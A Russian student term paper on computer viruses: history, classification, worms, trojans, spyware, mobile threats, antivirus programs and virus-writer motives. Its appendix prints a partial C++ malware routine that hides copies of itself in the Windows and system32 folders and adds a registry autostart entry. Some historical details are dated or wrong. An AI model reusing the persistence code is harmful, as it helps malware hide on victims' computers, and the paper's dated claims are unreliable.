Тема: Компьютерные вирусы

Курсовая работа

Дисциплина: Компьютерные и когнитивные системы

Тема: Компьютерные вирусы

Выполнил

студент гр. 4144/2

Медведева Т.А.

Проверил

проф. Александров В.В.

Санкт-Петербург

Содержание

Введение …………………………………………………………….....….…3

1. История компьютерных вирусов ……………………………...……..4

2. Классификация компьютерных вирусов ……………………….…...5

3. Характеристики основных компьютерных вирусов………………10

3.1 Червь ……………………………………………………………10

3.2 Троянские программы …………………………………………11

3.3 Зомби …………………………………………………………...12

3.4 Шпионские программы ………………………………………..13

4. Вирусы в мобильных телефонах ……………………………………13

5. Антивирусные программы …………………………………………..15

6. Типы антивирусных программ ……………………………………...16

6.1 DRWEB …………………………………………………………18

6.2 ADINF ……………………………………………………..……18

6.3 AVP ……………………………………………………………..19

7. Мотивы написания вирусов …………………………………………21

8. Хакеры ………………………………………………………………..23

9. Заключение ………………………………………………………......24

10. Список литературы ………………………………………….…25

11. Приложение 1. Пример вредоносного кода на C++ …..….....26

Введение

Компьютерный вирус — разновидность компьютерных программ или вредоносный код, отличительной особенностью которых является способность к размножению (саморепликация). В дополнение к этому вирусы могут без ведома пользователя выполнять прочие произвольные действия, в том числе наносящие вред пользователю и/или компьютеру.

Даже если автор вируса не программировал вредоносных эффектов, вирус может приводить к сбоям компьютера из-за ошибок, неучтённых тонкостей взаимодействия с операционной системой и другими программами. Кроме того, вирусы обычно занимают некоторое место на накопителях информации и отбирают некоторые другие ресурсы системы. Поэтому вирусы относят к вредоносным программам.

Некомпетентные пользователи ошибочно относят к компьютерным вирусам и другие виды вредоносных программ — программы-шпионы и прочее. Известны десятки тысяч компьютерных вирусов, которые распространяются через Интернет по всему миру.

Создание и распространение вредоносных программ (в том числе вирусов) преследуется в России согласно Уголовному кодексу РФ (глава 28, статья 273). Согласно доктрине информационной безопасности РФ, в России должен проводиться правовой ликбез в школах и вузах при обучении информатике и компьютерной грамотности по вопросам защиты информации в ЭВМ, борьбы с компьютерными вирусами, детскими порносайтами и обеспечению информационной безопасности в сетях ЭВМ.

1. История компьютерных вирусов

Основы теории самовоспроизводящихся механизмов заложил американец венгерского происхождения Джон фон Нейман, который в 1951 году предложил метод создания таких механизмов. С 1961 года известны рабочие примеры таких программ.

Первыми известными собственно вирусами являются Virus 1, 2, 3 и Elk Cloner для ПК Apple II, появившиеся в 1981 году. Зимой 1984 года появились первые антивирусные утилиты — CHK4BOMB и BOMBSQAD авторства Анди Хопкинса (англ. Andy Hopkins). В начале 1985 года Ги Вонг (англ. Gee Wong) написал программу DPROTECT — первый резидентный антивирус.

Первые вирусные эпидемии относятся к 1987—1989 годам: Brain (более 18 тысяч зараженных компьютеров, по данным McAfee), Jerusalem (проявился в пятницу 13 мая 1988 года, уничтожая программы при их запуске), червь Морриса (свыше 6200 компьютеров, большинство сетей вышло из строя на срок до пяти суток), DATACRIME (около 100 тысяч зараженных ПЭВМ только в Нидерландах).

Тогда же оформились основные классы двоичных вирусов: сетевые черви (червь Морриса, 1987), «троянские кони» (AIDS, 1989), полиморфные вирусы (Chameleon, 1990), стелс-вирусы (Frodo, Whale, 2-я половина 1990).

Параллельно оформляются организованные движения как про-, так и антивирусной направленности: в 1990 году появляются специализированная BBS Virus Exchange, «Маленькая чёрная книжка о компьютерных вирусах» Марка Людвига, первый коммерческий антивирус Symantec Norton AntiVirus.

В 1992 году появились первый конструктор вирусов для PC — VCL (для Amiga конструкторы существовали и ранее), а также готовые полиморфные модули (MtE, DAME и TPE) и модули шифрования для встраивания в новые вирусы.

В несколько последующих лет были окончательно отточены стелс- и полиморфные технологии (SMEG.Pathogen, SMEG.Queeg, OneHalf, 1994; NightFall, Nostradamus, Nutcracker, 1995), а также испробованы самые необычные способы проникновения в систему и заражения файлов (Dir II — 1991, PMBS, Shadowgard, Cruncher — 1993). Кроме того, появились вирусы, заражающие объектные файлы (Shifter, 1994) и исходные тексты программ (SrcVir, 1994). С распространением пакета Microsoft Office получили распространение макровирусы (Concept, 1995).

В 1996 году появился первый вирус для Windows 95 — Win95.Boza, а в декабре того же года — первый резидентный вирус для неё — Win95.Punch.

С распространением сетей и Интернета файловые вирусы всё больше ориентируются на них как на основной канал работы (ShareFun, 1997 — макровирус MS Word, использующий MS-Mail для распространения; Win32.HLLP.DeTroie, 1998 — семейство вирусов-шпионов; Melissa, 1999 — макровирус и сетевой червь, побивший все рекорды по скорости распространения). Эру расцвета «троянских коней» открывает утилита скрытого удаленного администрирования BackOrifice (1998) и последовавшие за ней аналоги (NetBus, Phase).

Вирус Win95.CIH достиг апогея в применении необычных методов, перезаписывая FlashBIOS зараженных машин (эпидемия в июне 1998 считается самой разрушительной за предшествующие годы).

В конце 1990-x — начале 2000-x годов с усложнением ПО и системного окружения, массовым переходом на сравнительно защищенные Windows семейства NT, закреплением сетей как основного канала обмена данными, а также успехами антивирусных технологий в обнаружении вирусов, построенных по сложным алгоритмам, последние стали всё больше заменять внедрение в файлы на внедрение в операционную систему (необычный автозапуск, руткиты) и подменять полиморфизм огромным количеством видов (число известных вирусов растет экспоненциально).

Вместе с тем, обнаружение в Windows и другом распространенном ПО многочисленных уязвимостей открыло дорогу червям-эксплоитам. В 2004 году беспрецедентные по масштабам эпидемии вызывают MsBlast (по данным Microsoft — более 16 млн систем), Sasser и Mydoom (оценочные ущербы 500 млн и 4 млрд долл. соответственно).

Кроме того, монолитные вирусы в значительной мере уступают место комплексам вредоносного ПО с разделением ролей и вспомогательными средствами (троянские программы, загрузчики/дропперы, фишинговые сайты, спам-боты и пауки). Также расцветают социальные технологии — спам и фишинг — как средство заражения в обход механизмов защиты ПО.

Вначале на основе троянских программ, а с развитием технологий p2p-сетей — и самостоятельно — набирает обороты самый современный вид вирусов — черви-ботнеты (Rustock, 2006, ок. 150 тыс. ботов; Conficker, 2008—2009, более 7 млн ботов; Kraken, 2009, ок. 500 тыс. ботов). Вирусы в числе прочего вредоносного ПО окончательно оформляются как средство киберпреступности.

2. Классификация компьютерных вирусов

Существует немало разновидностей вирусов, различающихся по основному способу распространения и функциональности. Если изначально вирусы распространялись на дискетах и других носителях, то сейчас доминируют вирусы, распространяющиеся через Интернет. Растёт и функциональность вирусов, которую они перенимают от других видов программ.

В настоящее время не существует единой системы классификации и именования вирусов (хотя попытка создать стандарт была предпринята на встрече CARO в 1991 году).

Принято разделять вирусы:

· по поражаемым объектам (файловые вирусы, загрузочные вирусы, скриптовые вирусы, макровирусы, вирусы, поражающие исходный код);

· по поражаемым операционным системам и платформам (DOS, Microsoft Windows, Unix, Linux);

· по технологиям, используемым вирусом (полиморфные вирусы, стелс-вирусы, руткиты);

· по языку, на котором написан вирус (ассемблер, высокоуровневый язык программирования, скриптовый язык и др.);

· по дополнительной вредоносной функциональности (бэкдоры, кейлоггеры, шпионы, ботнеты и др.).

Однако существуют и другие классификации вирусов:

По среде обитания они делятся на сетевые, файловые, загрузочные и файлово –загрузочные вирусы.

· Сетевые вирусы распространяются по различным компьютерным сетям.

· Загрузочные вирусы внедряются в загрузочный сектор диска (Boot – сектор) или в сектор, содержащий программу загрузки системного диска (Master Boot Record – MBR). Некоторые вирусы записывают свое тело в свободные сектора диска, помечая их в FAT – таблице как “плохие” (Bad cluster).

· Файловые вирусы инфицируют исполняемые файла компьютера, имеющие расширения com и exe. К этому же классу относятся и макровирусы, написанные помощью макрокоманд. Они заражают неисполняемые файлы (например, в текстовом редакторе MS Word или в электронных таблицах MS Excel).

· Загрузочно – файловые вирусы способны заражать и загрузочные секторы и файлы.

По способу заражения – на резидентные и нерезидентные вирусы.

· Резидентные вирусы оставляют в оперативной памяти компьютера свою резидентную часть, которая затем перехватывает обращения неинфицированных программ к операционной системе, и внедряются в них. Свои деструктивные действия и заражение других файлов, резидентные вирусы могут выполнять многократно.

· Нерезидентные вирусы не заражают оперативную память компьютера и проявляют свою активность лишь однократно при запуске инфицированной программы.

(Резидентные вирусы представляют собой программы, присутствующие в оперативной памяти либо хранящие там свою активную часть, которая постоянно заражает те или иные объекты операционной системы.

Нерезидентные вирусы загружаются лишь во время открытия зараженного файла или работы с инфицированным приложением.)

По степени опасности – на неопасные, опасные и очень опасные вирусы.

Действия вирусов могут быть не опасными, например, на экране появляется сообщение: “Хочу чучу”. Если с клавиатуры набрать слово “чуча”, то вирус временно “успокаивается”.

Значительно опаснее последствия действия вируса, который уничтожает часть файлов на диске.

Очень опасные вирусы самостоятельно форматируют жесткий диск и этим уничтожают всю имеющуюся информацию. Примером очень опасного вируса может служить вирус CIN (Чернобыль), активизирующийся 26 числа каждого месяца и способный уничтожать данные на жестком диске и в BIOS.

Еще одна существующая классификация вирусов – по их деструктивным возможностям.

· Безвредные вирусы – оказывают незначительное влияние на работу ПК, занимая часть системных ресурсов. Нередко пользователи даже не подозревают об их присутствии.

· Неопасные вирусы – также занимают часть ресурсов компьютера, но об их присутствии пользователь знает хорошо. Обычно они проявляются в виде визуальных и звуковых эффектов и не вредят данным пользователя.

· Опасные вирусы – программы, которые нарушают нормальную работу пользовательских приложений или всей системы.

· Очень опасные вирусы – программы, задача которых заключается в уничтожении файлов, выводе из стоя программ и ОС или рассекречивании конфиденциальных данных.

По особенностям алгоритма различают:

· Простейшие вирусы – вирусы, которые при распространении своих копий обязательно изменяют содержимое дисковых секторов или файлов, поэтому его достаточно легко обнаружить.

· Вирусы-спутники (компаньоны)- вирус, который не внедряется в сам исполняемый файл, а создает его зараженную копию с другим расширением.

· Стелс-вирус (невидимка) – вирусы, скрывающие свое присутствие в зараженных объектах, подставляя вместо себя незараженные участки.

· Полиморфные вирусы (мутанты) – вирусы модифицирующие свой код таким образом, что копии одного и того же вируса не совпадают.

· Макровирус – вирусы, которые заражают документы Microsoft Office.

· Троянская программа – программа, которая маскируется под полезные приложения (утилиты или даже антивирусные программы), но при этом производит различные разрушительные действия. Она не внедряется в другие файлы и не обладает способностью к саморазмножению.

· Черви – это вредительские компьютерные программы, которые способны саморазмножаться, но, в отличие от вирусов не заражают другие файлы. Свое название черви получили потому, что для распространения они используют компьютерные сети и электронную почту.

По целостности – на монолитные и распределенные вирусы.

· Программа монолитного вируса представляет собой единый блок, который можно обнаружить после инфицирования.

· Программа распределенного вируса разделена на части. Эти части содержат инструкции, которые указывают компьютеру, как собрать их воедино, чтобы воссоздать вирус. Таким образом, вирус почти все время находится в распределенном состоянии, и лишь на короткое время собирается в единое целое.

Основными источниками вирусов являются:

· дискета, на которой находятся зараженные вирусом файлы;

· компьютерная сеть, в том числе система электронной почты и Internet;

· жесткий диск, на который попал вирус в результате работы с зараженными программами;

· вирус, оставшийся в оперативной памяти после предшествующего пользователя.

Основными ранними признаками заражения компьютера вирусом являются:

· уменьшение объема свободной оперативной памяти;

· замедление загрузки и работы компьютера;

· непонятные (без причин) изменения в файлах, а также изменения размеров и даты последней модификации файлов;

· ошибки при загрузке операционной системы;

· невозможность сохранять файлы в нужных каталогах;

· непонятные системные сообщения, музыкальные и визуальные эффекты и т.д.

Признаками активной фазы вируса являются:

· исчезновение файлов;

· форматирование жесткого диска;

· невозможность загрузки файлов или операционной системы.

3. Характеристики основных компьютерных вирусов

3.1 Червь

Червь (Worm)- это программа, которая тиражируется на жестком диске, в памяти компьютера и распространяется по сети. Особенностью червей, отличающих их от других вирусов, является то, что они не несут в себе никакой вредоносной нагрузки, кроме саморазмножения, целью которого является замусоривание памяти, и как следствие, затормаживание работы операционной системы.

Все механизмы («векторы атаки») распространения червей делятся на две большие группы:

Использование уязвимостей и ошибок администрирования в программном обеспечении, установленном на компьютере. Например, вредоносная программа Conficker для своего распространения использовала уязвимость в операционной системе Windows; червь Морриса подбирал пароль по словарю. Такие черви способны распространяться автономно, выбирая и атакуя компьютеры в полностью автоматическом режиме.

Используя средства так называемой социальной инженерии, провоцируется запуск вредоносной программы самим пользователем. Чтобы убедить пользователя в том, что файл безопасен, могут подключаться недостатки пользовательского интерфейса программы — например, червь VBS.LoveLetter использовал тот факт, что Outlook Express скрывает расширения файлов. Данный метод широко применяется в спам-рассылках, социальных сетях и т. д.

Иногда встречаются черви с целым набором различных векторов распространения, стратегий выбора жертвы, и даже эксплойтов под различные операционные системы.

3.2 Троянские программы

Троян или троянский конь (Trojans) - это программа, которая находится внутри другой, как правило, абсолютно безобидной программы, при запуске которой в систему инсталлируются программа, написанная только с одной целью - нанести ущерб целевому компьютеру путем выполнения несанкционированных пользователем действий: кражи, порчи или удаления конфиденциальных данных, нарушения работоспособности компьютера или использования его ресурсов в неблаговидных целях.

Название «троянские» восходит к эпизоду в Илиаде, рассказывающем о «Троянском коне» — дарёном деревянном коне, использованном для проникновения в Трою, что и стало причиной падения Трои. В Коне, подаренном в знак лже-перемирия, прятались воины Одиссея, ночью выбравшиеся из Коня и открывшие ворота основным силам антитроянской армии. Больша́ я часть троянских программ действует подобным образом — маскируется под безвредные или полезные программы, чтобы пользователь запустил их на своем компьютере. Считается, что первым этот термин в контексте компьютерной безопасности употребил в своём отчёте «Computer Security Technology Planning Study» Дэниэл Эдвардс, сотрудник АНБ.[1]

«Трояны» — самый простой вид вредоносных программ, сложность которых зависит исключительно от сложности истинной задачи и средств маскировки. Самые примитивные «трояны» (например, стирающие содержимое диска при запуске) могут иметь исходный код в несколько строк.

Примеры троянских программ: Back Orifice, Pinch, TDL-4, Trojan.Winlock.

Таким образом, троянские программы являются одним из самых опасных видов вредоносного программного обеспечения, поскольку в них заложена возможность самых разнообразных злоумышленных действий.

Троянские программы распространяются людьми — как непосредственно загружаются в компьютерные системы злоумышленниками-инсайдерами, так и побуждают пользователей загружать и/или запускать их на своих системах.

Для достижения последнего, троянские программы помещаются злоумышленниками на открытые или индексируемые ресурсы (файл-серверы и системы файлообмена), носители информации, присылаются с помощью служб обмена сообщениями (например, электронной почтой), попадают на компьютер через бреши безопасности или загружаются самим пользователем с адресов полученных одним из перечисленных способов.

Иногда использование троянов является лишь частью спланированной многоступенчатой атаки на определенные компьютеры, сети или ресурсы (в том числе, третьи).

3.3 Зомби

Зомби (Zombie) - это программа-вирус, которая после проникновения в компьютер, подключенный к сети Интернет управляется извне и используется злоумышленниками для организации атак на другие компьютеры. Зараженные таким образом компьютеры-зомби могут объединяться в сети, через которые рассылается огромное количество нежелательных сообщений электронной почты, а также распространяются вирусы и другие вредоносные программы.

3.4 Шпионские программы

Шпионская программа (Spyware) - это программный продукт, установленный или проникший на компьютер без согласия его владельца, с целью получения практически полного доступа к компьютеру, сбора и отслеживания личной или конфиденциальной информации.

Эти программы, как правило, проникают на компьютер при помощи сетевых червей, троянских программ или под видом рекламы (adware).

Одной из разновидностей шпионских программ являются фишинг рассылки.

Фишинг (Phishing) - это почтовая рассылка имеющая своей целью получение конфиденциальной финансовой информации. Такое письмо, как правило, содержит ссылку на сайт, являющейся точной копией интернет-банка или другого финансового учреждения. Пользователь, обычно, не догадывается, что находится на фальшивом сайте и спокойно выдает злоумышленникам информацию о своих счетах, кредитных карточках, паролях и т. д.

Фарминг – это замаскированная форма фишинга, заключающаяся в том, что при попытке зайти на официальный сайт интернет банка или коммерческой организации, пользователь автоматически перенаправляется на ложный сайт, который очень трудно отличить от официального сайта.

Как и в случае фишинга основной целью злоумышленников, использующих фарминг, является завладение личной финансовой информацией пользователя. Отличие заключается только в том, что вместо электронной почты мошенники используют более изощренные методы направления пользователя на фальшивый сайт.

4. Вирусы в мобильных телефонах

Мобильные вирусы – это компьютерные (программные) вирусы, разработанные злоумышленниками специально для распространения через мобильные устройства, такие как смартфоны и КПК. Чаще всего мобильные вирусы распространяются с помощью SMS и MMS сообщений, а также по каналу Bluetooth.

Основной целью создания и распространения мобильных вирусов является несанкционированный доступ к личным данным владельцев сотовых телефонов и КПК, а также незаконное обогащение путем дистанционной организации звонков и рассылки SMS и MMS с чужих мобильных телефонов на платные номера.

Наиболее известными и распространенными мобильными вирусами, в настоящее время являются: Cabir, Comwar, Brador, Viver и многие другие.

Учитывая, что на сегодняшний день, не существует официальной классификации программных вирусов, мобильные вирусы часто называют мобильными зловредами, мобильными вредоносными программами, мобильными угрозами и т.д.

Вирусы, распространяющие через мобильные телефоны, схожи с обычными компьютерными вирусами. Они представляют собой файлы, которые заражают телефон, а потом через него передаются на другие телефоны. В основном, вирус может попасть в телефон через интернет, mms - сообщения и Bluetooth.

Заражение чаще всего проникает через игры, спам, программы безопасности и порнографические файлы. Бывает, что вирусы маскируются под сообщения от друзей, которые пользователь телефона вряд ли обойдёт стороной. Но проникнуть в систему мобильного телефона вирусу не так просто. Ведь не достаточно просто прочитать такое сообщение, нужно установить, полученную через него программу себе на телефон. Самораскрывающийся мобильный вирус, к нашему с вами счастью, ещё не придумали. Именно поэтому, заразить всю операционную систему мобильного и нарушить его работу такие вирусы пока не могут.

Также, мобильные вирусы не проникают в очень простые модели телефонов. Ведь для проникновения вируса нужен хотя бы Bluetooth или любая другая система передачи данных.

Мобильные вирусы не так безобидны, как кажутся на первый взгляд. Они могут мгновенно удалить всю информацию о контактах, телефонные заметки, разослать заражённые сообщения на телефоны друзей и знакомых, при этом, за все эти действия будете платить вы. А самое страшное, что они могут – это полностью вывести мобильный телефон из строя.

Основная мера предосторожности от мобильных вирусов, такая же, как и от компьютерных: не нужно открывать и загружать незнакомые файлы. Но если вы всё-таки попались на уловки мошенников, которые с каждым днём становятся всё хитрее и коварнее, то нужно как можно быстрее начинать бороться с вирусом.

Необходимо выключить Bluetooth и закрыть доступ для других пользователей, тщательно проверить систему безопасности, поискать незнакомые папки и удалить их.

Ну а лучше всего, установить на телефон антивирус. Он надёжно защитить ваш телефон от заражения вредоносными вирусами.

5. Антивирусные программы

Если не принимать меры для защиты от компьютерных вирусов, то следствия заражения могут быть очень серьезными. В ряде стран уголовное законодательство предусматривает ответственность за компьютерные преступления, в том числе за внедрение вирусов. Для защиты информации от вирусов используются общие и программные средства.

К общим средствам, помогающим предотвратить заражение и его разрушительных последствий относят:

· резервное копирование информации (создание копий файлов и системных областей жестких дисков);

· избежание пользования случайными и неизвестными программами. Чаще всего вирусы распространяются вместе с компьютерными программами;

· перезагрузка компьютера перед началом работы, в частности, в случае, если за этим компьютером работали другие пользователи;

· ограничение доступа к информации, в частности физическая защита дискеты во время копирования файлов с нее.

К программным средствам защиты относят разные антивирусные программы (антивирусы). Антивирус - это программа, выявляющая и обезвреживающая компьютерные вирусы. Следует заметить, что вирусы в своем развитии опережают антивирусные программы, поэтому даже в случае регулярного пользования антивирусов, нет 100% гарантии безопасности.

Антивирусные программы могут выявлять и уничтожать лишь известные вирусы, при появлении нового компьютерного вируса защиты от него не существует до тех пор, пока для него не будет разработан свой антивирус.

Однако, много современных антивирусных пакетов имеют в своем составе специальный программный модуль, называемый эвристическим анализатором, который способен исследовать содержимое файлов на наличие кода, характерного для компьютерных вирусов. Это дает возможность своевременно выявлять и предупреждать об опасности заражения новым вирусом.

6. Типы антивирусных программ

Различают следующие типы антивирусных программ:

1) программы-детекторы: предназначены для нахождения зараженных файлов одним из известных вирусов. Некоторые программы-детекторы могут также лечить файлы от вирусов или уничтожать зараженные файлы. Существуют специализированные, то есть предназначенные для борьбы с одним вирусом детекторы и полифаги, которые могут бороться с многими вирусами;

2) программы-лекари: предназначены для лечения зараженных дисков и программ. Лечение программы состоит в изъятии из зараженной программы тела вируса. Также могут быть как полифагами, так и специализированными;

3) программы-ревизоры: предназначены для выявления заражения вирусом файлов, а также нахождение поврежденных файлов. Эти программы запоминают данные о состоянии программы и системных областей дисков в нормальном состоянии (до заражения) и сравнивают эти данные в процессе работы компьютера. В случае несоответствия данных выводится сообщение о возможности заражения;

4) лекари-ревизоры: предназначены для выявления изменений в файлах и системных областях дисков и, в случае изменений, возвращают их в начальное состояние.

5) программы-фильтры: предназначены для перехвата обращений к операционной системе, которые используются вирусами для размножения и сообщают об этом пользователя. Пользователь может разрешить или запретить выполнение соответствующей операции. Такие программы являются резидентными, то есть они находятся в оперативной памяти компьютера.

6) программы-вакцины: используются для обработки файлов и boot-секторов с целью предупреждения заражения известными вирусами (в последнее время этот метод используется все чаще).

Следует заметить, что выбор одного " наилучшего" антивируса крайне ошибочное решение. Рекомендуется использовать несколько разных антивирусных пакетов одновременно. Выбирая антивирусную программу следует обратить внимание на такой параметр, как количество распознающих сигнатур (последовательность символов, которые гарантированно распознают вирус). Второй параметр - наличие эвристического анализатора неизвестных вирусов, его присутствие очень полезно, но существенно замедляет время работы программы. На сегодняшний день существует большое количество разнообразных антивирусных программ. Рассмотрим коротко, распространенные в странах СНГ.

DRWEB

Один из лучших антивирусов с мощным алгоритмом нахождения вирусов. Полифаг, способный проверять файлы в архивах, документы Word и рабочие книги Excel, выявляет полиморфные вирусы, которые в последнее время, получают все большее распространение. Достаточно сказать, что эпидемию очень опасного вируса OneHalf остановил именно DrWeb. Эвристический анализатор DrWeb, исследуя программы на наличие фрагментов кода, характерных для вирусов, разрешает найти почти 90% неизвестных вирусов. При загрузке программы, в первую очередь DrWeb проверяет самого себя на целостность, после чего тестирует оперативную память. Программа может работать в диалоговом режиме, имеет удобный настраиваемый интерфейс пользователя.

ADINF

Антивирус-ревизор диска ADINF (Avanced DiskINFoscope) разрешает находить и уничтожать, как существующие обычные, stealth- и полиморфные вирусы, так и совсем новые. Антивирус имеет в своем распоряжении лечащий блок ревизора ADINF - Adinf Cure Module - что может обезвредить до 97% всех вирусов. Эту цифру приводит " Диалогнаука", исходя из результатов тестирования, которое происходило на коллекциях вирусов двух признанных авторитетов в этой области - Д.Н.Лозинского и фирмы Dr.Sоlомоn's (Великобритания).

ADINF загружается автоматически в случае включения компьютера и контролирует boot-сектор и файлы на диске (дата и время создания, длина, контрольная сумма), выводя сообщения про их изменения. Благодаря тому, что ADINF осуществляет дисковые операции в обход операционной системы, обращаясь к функциям BIOS, достигаются не только возможность выявления активных stеаlth-вірусів, но и высокая скорость проверки диска. Если найден boot-вирус, то ADINF просто восстановит предшествующий загрузочный сектор, который хранится в его таблице. Если вирус файловый, то здесь на помощь приходит лечащий блок Adinf Cure Module, который на основе отчета основного модуля о зараженных файлах сравнивает новые параметры файлов с предыдущими, хранящиеся в специальных таблицах. При выявлении расхождений ADINF восстанавливает предыдущее состояние файла, а не уничтожает тело вируса, как это делают полифаги.

AVP

Антивирус AVP (AntiVirus Program) относится к полифагам, в процессе работы проверяет оперативную память, файлы, в том числе архивные, на гибких, локальных, сетевых и CD-ROM дисках, а также системные структуры данных, такие как загрузочный сектор, таблицу разделов и т.д. Программа имеет эвристический анализатор, который, по утверждениям разработчиков антивируса способен находить почти 80% всех вирусов. Программа AVP является 32-разрядным приложением для работы в среде операционных систем Windows 98, NT и 2000, имеет удобный интерфейс, а также одну из самых больших в мире антивирусную базу. Базы антивирусов к AVP обновляются приблизительно один раз в неделю и их можно получить с Internеt. Эта программа осуществляет поиск и изъятие разнообразнейших вирусов, в том числе:

· полиморфных, или самошифрующихся вирусов;

· стелс-вирусов, или вирусов-невидимок;

· новых вирусов для Windows;

· макровирусов, заражающих документы Word и таблицы Excel.

Кроме того, программа AVP осуществляет контроль файловых операций в системе в фоновом режиме, выявляет вирус до момента реального заражения системы, а также определяет неизвестные вирусы с помощью эвристического модуля.

Однако нет гарантии, что антивирусы смогут справиться с новейшими разработками. Поэтому следует придерживаться некоторых мер предосторожности, в частности:

· Не работать под привилегированными учётными записями без крайней необходимости.

· Не запускать незнакомые программы из сомнительных источников.

· Стараться блокировать возможность несанкционированного изменения системных файлов.

· Отключать потенциально опасный функционал системы (например autorun носителей в MS Windows, сокрытие файлов, их расширений и пр.).

· Не заходить на подозрительные сайты, обращать внимание на адрес в адресной строке обозревателя.

· Пользоваться только доверенными дистрибутивами.

· Постоянно делать резервные копии важных данных и иметь образ системы со всеми настройками для быстрого развёртывания.

· Выполнять регулярные обновления часто используемых программ, особенно, обеспечивающих безопасность системы.

7. Мотивы написания вирусов

Попробуем понять, зачем люди пишут вирусы?

1) Для удовольствия

Это первая и наиболее основная причина. Это может звучать смешно, по сравнению с наносимым ущербом, но автору было просто интересно, что может произойти.

2) Поиск известности

Вторая причина для написания - это добиться того, чтобы твой кусок кода появился на Wildlist, сайте освещающем циркулирующие в данный момент по миру вирусы.

3) Раскрывшиеся серьезные кодеры

Эта группа включает в себя более опасных и серьезных кодеров, которые имеют достаточно серьезный опыт в программировании, и могут писать на уровне антивирусной индустрии. В созданные вирусы они добавляют процедуры и функции не дающие при дизассемблировании получить исходный код. Обычно такие вирусы пишутся для какого-либо исследования, а не для нанесения вреда конечному пользователю. Хотелось бы упомянуть, что доступ к этому коду имеет достаточно ограниченное количество людей, и все из этой же группы, либо этот код становится доступным в сети, как доказательство найденной уязвимости. Они не наносят никому ущерба, а указывают на направление, откуда ущерб может быть нанесен.

4) Рассерженные одиночки

Последняя и наиболее опасный тип вирусописателя. Их не интересует какая-либо мораль или закон, и забота о том ущербе, который может понести пострадавший. У каждого из них есть своя персональная цель. Они не относят себя ни к какой группе кодеров, ни в коей мере. Их задача нанести максимальный урон или создать вирус который " даст власть над всем миром".

Этих людей нельзя подвести под общие рамки вирусописателей, так как у каждого их них своя мораль и о ней никто не знает. Сейчас к этой группе относится не так много людей. И хорошо, что пока их амбиции не совпадают с их возможностями. Однако, с учетом того, насколько чаще находятся уязвимости в используемом всеми ПО, шанс добиться своей цели у них с каждым днем все выше.

5) Увлечение

Как уже говорилось, многие вирусописатели делают это из увлечения. У кого-то есть достаточно свободного времени, которое он проводит за любимым занятием. Это скорее относится к молодым людям, так как у более старшего поколения чаще гораздо больше забот.

Их можно сравнить с первой группой, однако чаще они более грамотно программируют, часами смотрят логи на наличие частей пропущенного кода, или раз за разом проверяют работоспособность своих творений под различными ОС (своего рода бета-тестирование). Кодеры часто помогают друг другу советами, делятся информацией, ночами изучают новые вирусы, или придумывают новые идеи.

8. Хакеры

Понятие компьютерного вируса ассоциируется с хакерами.

Хакер (англ. hacker, от to hack — рубить, кромсать) — чрезвычайно квалифицированный ИТ-специалист, человек, который понимает самые глубины работы компьютерных систем. Изначально хакерами называли программистов, которые исправляли ошибки в программном обеспечении каким-либо быстрым и далеко не всегда элегантным (в контексте используемых в программе стиля программирования и ее общей структуры, дизайна интерфейсов) или профессиональным способом; слово hack пришло из лексикона хиппи, в русском языке есть идентичное жаргонное слово " врубаться".

Сейчас хакеров очень часто отождествляют с компьютерными взломщиками — крэкерами (англ. cracker, от to crack — раскалывать, разламывать); однако такое употребление слова «хакер» неверно.

Заключение

В настоящее время для существует несколько десятков тысяч компьютерных вирусов и их число продолжает расти. Поэтому следует, с одной стороны, ожидать постепенного проникновения в Россию новых, более опасных и изощренно написанных вирусов, включая стелс-вирусы, и с другой - потока сравнительно простых, а зачастую и безграмотно написанных вирусов в результате " вирусного взрыва" внутри самой страны. Не следует думать, что эволюция вирусов пойдет только в направлении их усложнения.

Опыт показал, что сложность стелс-вирусов существенно снижает их жизнеспособность. Как отмечал С.Н.Паркинсон в одном из своих знаменитых законов, " рост означает усложнение, а усложнение - разложение". По-видимому, эволюция компьютерных вирусов будет идти сразу в нескольких направлениях, лишь одним из которых являются стелс-вирусы.

Хотя общее количество вирусов велико, лежащие в их основе идеи сравнительно малочисленны и не так просто поддаются расширению. Поэтому основной тенденцией, наблюдаемой в настоящее время, является не столько появление новых типов вирусов, сколько комбинирование уже известных идей. Такие " гибриды", как правило, оказываются опаснее базисных видов.

Еще чаще наблюдается тенденция к минимальной модификации одного из получивших широкое распространение вирусов, что приводит к образованию вокруг " базисного" вируса группы штаммов, причем их количество в некоторых случаях превышает десяток.

Список литературы

1. Безруков Н.Н. Компьютерная вирусология. - К.: УРЕ, 1991.

2. Защита программного обеспечения. Под ред. Гроувера Д. -М.: Мир, 1992.

3. Зегжда Д.П., Матвеев В.А., Молотков С.В., Тихомиров Ю.В., под редакцией Шмакова Э. М. Защита информации в компьютерных системах. Теоретические аспекты защиты от вирусов. - СПб.: СПбГТУ, 1993.

4. Касперский Е. Компьютерные вирусы: эволюция вверх, вниз ив стороны. Материалы эхо-конференции SU.VIRUS. - 1994.

5. Микляев А. Настольная книга пользователя

6. Расторгуев С.П., Дмитриевский Н.Н. Искусство защиты и “раздевания" программ. - М.: 1991.

7. Спесивцев А.В. и др. Защита информации в персональных ЭВМ. М.: Радио и связь, 1992

8. Фигурнов В.Э. IBM PC для пользователя

9. Cohen F. Computer viruses. Theory and experiments // Adv.Comput. Syst. Secur. Vol. 3 - Norwood (Mass), 1988.

Приложение 1. Пример вредоносного кода на C++

Подключаем библиотеки и создаем основные переменные.

#include < windows.h>

#include < iostream.h>

WINAPI WinMain(HINSTANCE hint, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)

{

HKEY key;

char sysdir[256],

windir[256],

myname[256];

Узнаем свое имя функцией GetModuleFileName. И узнает адрес папки windows и папки system32 функциями GetWindowsDirectory и GetSystemDirectory

GetModuleFileName(hint, myname, 256);

GetWindowsDirectory(windir, sizeof(windir));

GetSystemDirectory(sysdir, sizeof(sysdir));

Добавляем к строкам содержащим пути к системным папкам имя нашего вируса, чтобы скопировать в эти папки себя.

strcat(windir, " \\internet.exe");

strcat(sysdir, " \\internet.exe");

Копируемся и ставим себе скрытые атрибуты

CopyFile(myname, windir, FALSE);

CopyFile(myname, sysdir, FALSE);

SetFileAttributes(windir, FILE_ATTRIBUTE_HIDDEN);

SetFileAttributes(sysdir, FILE_ATTRIBUTE_HIDDEN);

Прописываемся в реестр на автозагрузку

RegOpenKeyEx(HKEY_LOCAL_MACHINE, " Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, & key);

RegSetValueEx(key, " internet.exe", 0, REG_SZ, (BYTE *)sysdir, 256);

RegCloseKey(key);

Ожидаем 2 минуты.

Sleep(60000*2); //Две минуты

